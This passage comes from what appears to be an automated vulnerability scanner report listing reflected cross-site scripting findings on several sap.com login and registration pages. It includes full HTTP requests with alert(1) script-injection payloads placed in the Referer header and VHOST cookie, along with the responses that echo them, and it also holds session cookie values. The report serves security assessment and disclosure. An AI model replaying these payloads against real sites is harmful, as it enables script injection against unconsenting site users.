Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fen_US%2fDisplayCategoryListPage%26categoryID%3d54721500; mbox=session#1321210845752-117832#1321213133|check#true#1321211333; VHOST=standard; uRoamTestCookie=TEST; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 19:16:01 GMT
Server: Apache
Connection: Close
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html
Content-Length: 1710

<html>
<HEAD>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<link rel="stylesheet" type="text/css" HREF="/res/main3.css">
</HEAD>

<body>

<TABLE CELLPADDING=10 BORDER=0 WID
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=4b8d9\"><script>alert(1)</script>a3b8e5a18ac">
...[SNIP]...

1.169. https://www.sap.com/campaign/training-certification/register.epx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sap.com
Path:   /campaign/training-certification/register.epx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 274f2'%3balert(1)//2101c281023 was submitted in the Referer HTTP header. This input was echoed as 274f2';alert(1)//2101c281023 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /campaign/training-certification/register.epx?kNtBzmUK9zU HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fen_US%2fDisplayCategoryListPage%26categoryID%3d54721500; mbox=session#1321210845752-117832#1321213133|check#true#1321211333; 37021986-VID=5110247826455; 37021986-SKEY=8052586457831773007; HumanClickSiteContainerID_37021986=STANDALONE; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|
Referer: http://www.google.com/search?hl=en&q=274f2'%3balert(1)//2101c281023

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; domain=.sap.com; expires=Tue, 12-Nov-2013 19:18:01 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:18:01 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.google.com%2fsearch%3fhl%3den%26q%3d274f2%27%3balert(1)%2f%2f2101c281023; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; domain=.sap.com; expires=Tue, 13-Nov-2012 19:18:01 GMT; path=/
Set-Cookie: CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:18:02 GMT
Content-Length: 86631


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script language="
...[SNIP]...
nguage="javascript" type="text/javascript">var T_T = 'PAGE';var T_L = 'Registration Page';var T_V = 'CRM-AP09-IND-SRMQ2';var T_C = 'CRM-AP09-IND-SRMQ2ANZ';var T_R='http://www.google.com/search?hl=en&q=274f2';alert(1)//2101c281023';TrackInteraction();</script>
...[SNIP]...

1.170. https://connectblrl02.sap.com/my.logon.php3 [VHOST cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://connectblrl02.sap.com
Path:   /my.logon.php3

Issue detail

The value of the VHOST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80f67</script><script>alert(1)</script>2c17b840303 was submitted in the VHOST cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /my.logon.php3?check=1 HTTP/1.1
Host: connectblrl02.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://connectblrl02.sap.com/my.logon.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fen_US%2fDisplayCategoryListPage%26categoryID%3d54721500; mbox=session#1321210845752-117832#1321213133|check#true#1321211333; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; VHOST=standard80f67</script><script>alert(1)</script>2c17b840303; uRoamTestCookie=TEST

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 19:15:44 GMT
Server: Apache
Connection: close
Set-Cookie: uRoamTestCookie=TEST; path=/; secure
Expires: 0
Last-Modified: Sun, 13 Nov 2011 19:15:44 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html
Content-Length: 20155

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="ca
...[SNIP]...
ectblrl02.sap.com/my.logon.php3?check=1";
internal = true;

} else if(a_url.indexOf("error_number=10015") != -1) { //10015 - start process prelogon sequence from the begining
a_url="/standard80f67</script><script>alert(1)</script>2c17b840303";
a_data = "";
internal = true;
settext("Please, close this browser window");
stop();

} else if((a_url.indexOf("/denied") == 0)||(a_url.indexOf("error_number=10014") != -1)) { //100
...[SNIP]...

1.171. https://connectsha01.sap.com/my.logon.php3 [VHOST cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://connectsha01.sap.com
Path:   /my.logon.php3

Issue detail

The value of the VHOST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 284c6</script><script>alert(1)</script>affb05762de was submitted in the VHOST cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /my.logon.php3?check=1 HTTP/1.1
Host: connectsha01.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://connectsha01.sap.com/my.logon.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fen_US%2fDisplayCategoryListPage%26categoryID%3d54721500; mbox=session#1321210845752-117832#1321213133|check#true#1321211333; VHOST=standard284c6</script><script>alert(1)</script>affb05762de; F5CAPTCHA=3f04e6dfd219a9414e8dc00f93c51d8f; uRoamTestCookie=TEST; ecomssid=vqfv91ikhjeot6hs582hd8sbu1; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 19:23:41 GMT
Server: Apache
Connection: close
Set-Cookie: uRoamTestCookie=TEST; path=/; secure
Expires: 0
Last-Modified: Sun, 13 Nov 2011 19:23:41 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html
Content-Length: 20160

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="ca
...[SNIP]...
nectsha01.sap.com/my.logon.php3?check=1";
internal = true;

} else if(a_url.indexOf("error_number=10015") != -1) { //10015 - start process prelogon sequence from the begining
a_url="/standard284c6</script><script>alert(1)</script>affb05762de";
a_data = "";
internal = true;
settext("Please, close this browser window");
stop();

} else if((a_url.indexOf("/denied") == 0)||(a_url.indexOf("error_number=10014") != -1)) { //100
...[SNIP]...

1.172. https://connectsin01.sap.com/my.logon.php3 [VHOST cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://connectsin01.sap.com
Path:   /my.logon.php3

Issue detail

The value of the VHOST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e054a</script><script>alert(1)</script>70576b0a72f was submitted in the VHOST cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /my.logon.php3?check=1 HTTP/1.1
Host: connectsin01.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://connectsin01.sap.com/my.logon.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fen_US%2fDisplayCategoryListPage%26categoryID%3d54721500; mbox=session#1321210845752-117832#1321213133|check#true#1321211333; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; VHOST=standarde054a</script><script>alert(1)</script>70576b0a72f; F5CAPTCHA=54d699bf05e00e3f8d4b6053288af958; uRoamTestCookie=TEST

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 19:14:58 GMT
Server: Apache
Connection: close
Set-Cookie: uRoamTestCookie=TEST; path=/; secure
Expires: 0
Last-Modified: Sun, 13 Nov 2011 19:14:58 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html
Content-Length: 20160

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="ca
...[SNIP]...
nectsin01.sap.com/my.logon.php3?check=1";
internal = true;

} else if(a_url.indexOf("error_number=10015") != -1) { //10015 - start process prelogon sequence from the begining
a_url="/standarde054a</script><script>alert(1)</script>70576b0a72f";
a_data = "";
internal = true;
settext("Please, close this browser window");
stop();

} else if((a_url.indexOf("/denied") == 0)||(a_url.indexOf("error_number=10014") != -1)) { //100
...[SNIP]...

1.173. https://connectsyd01.sap.com/my.logon.php3 [VHOST cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://connectsyd01.sap.com
Path:   /my.logon.php3

Issue detail

The value of the VHOST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2859f</script><script>alert(1)</script>037a63493f4 was submitted in the VHOST cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /my.logon.php3?check=1 HTTP/1.1
Host: connectsyd01.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://connectsyd01.sap.com/my.logon.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fen_US%2fDisplayCategoryListPage%26categoryID%3d54721500; mbox=session#1321210845752-117832#1321213133|check#true#1321211333; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; VHOST=standard2859f</script><script>alert(1)</script>037a63493f4; F5CAPTCHA=fc7a57c5323a1d028210e6d7057a4ba8; uRoamTestCookie=TEST

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 19:15:01 GMT
Server: Apache
Connection: close
Set-Cookie: uRoamTestCookie=TEST; path=/; secure
Expires: 0
Last-Modified: Sun, 13 Nov 2011 19:15:01 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html
Content-Length: 20144

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="ca
...[SNIP]...
nectsyd01.sap.com/my.logon.php3?check=1";
internal = true;

} else if(a_url.indexOf("error_number=10015") != -1) { //10015 - start process prelogon sequence from the begining
a_url="/standard2859f</script><script>alert(1)</script>037a63493f4";
a_data = "";
internal = true;
settext("Please, close this browser window");
stop();

} else if((a_url.indexOf("/denied") == 0)||(a_url.indexOf("error_number=10014") != -1)) { //100
...[SNIP]...

1.174. https://connecttyo01.sap.com/my.logon.php3 [VHOST cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://connecttyo01.sap.com
Path:   /my.logon.php3

Issue detail

The value of the VHOST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7dec0</script><script>alert(1)</script>bda20c7d112 was submitted in the VHOST cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /my.logon.php3?check=1 HTTP/1.1
Host: connecttyo01.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://connecttyo01.sap.com/my.logon.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fen_US%2fDisplayCategoryListPage%26categoryID%3d54721500; mbox=session#1321210845752-117832#1321213133|check#true#1321211333; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; VHOST=standard7dec0</script><script>alert(1)</script>bda20c7d112; uRoamTestCookie=TEST

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 19:14:45 GMT
Server: Apache
Connection: close
Set-Cookie: uRoamTestCookie=TEST; path=/; secure
Expires: 0
Last-Modified: Sun, 13 Nov 2011 19:14:45 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html
Content-Length: 20160

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="ca
...[SNIP]...
necttyo01.sap.com/my.logon.php3?check=1";
internal = true;

} else if(a_url.indexOf("error_number=10015") != -1) { //10015 - start process prelogon sequence from the begining
a_url="/standard7dec0</script><script>alert(1)</script>bda20c7d112";
a_data = "";
internal = true;
settext("Please, close this browser window");
stop();

} else if((a_url.indexOf("/denied") == 0)||(a_url.indexOf("error_number=10014") != -1)) { //100
...[SNIP]...

1.175. https://connectvan01.sap.com/my.logon.php3 [VHOST cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://connectvan01.sap.com
Path:   /my.logon.php3

Issue detail

The value of the VHOST cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5312d"><script>alert(1)</script>78386a6f3a8 was submitted in the VHOST cookie. This input was echoed as 5312d\"><script>alert(1)</script>78386a6f3a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /my.logon.php3?check=1 HTTP/1.1
Host: connectvan01.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://connectvan01.sap.com/my.logon.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fen_US%2fDisplayCategoryListPage%26categoryID%3d54721500; mbox=session#1321210845752-117832#1321213133|check#true#1321211333; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; VHOST=standard5312d"><script>alert(1)</script>78386a6f3a8; uRoamTestCookie=TEST

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 17:39:21 GMT
Server: Apache
Connection: close
Set-Cookie: uRoamTestCookie=TEST; path=/; secure
Expires: 0
Last-Modified: Sun, 13 Nov 2011 17:39:21 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html
Content-Length: 13321

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="ca
...[SNIP]...
<input type=hidden name="vhost" value="standard5312d\"><script>alert(1)</script>78386a6f3a8">
...[SNIP]...

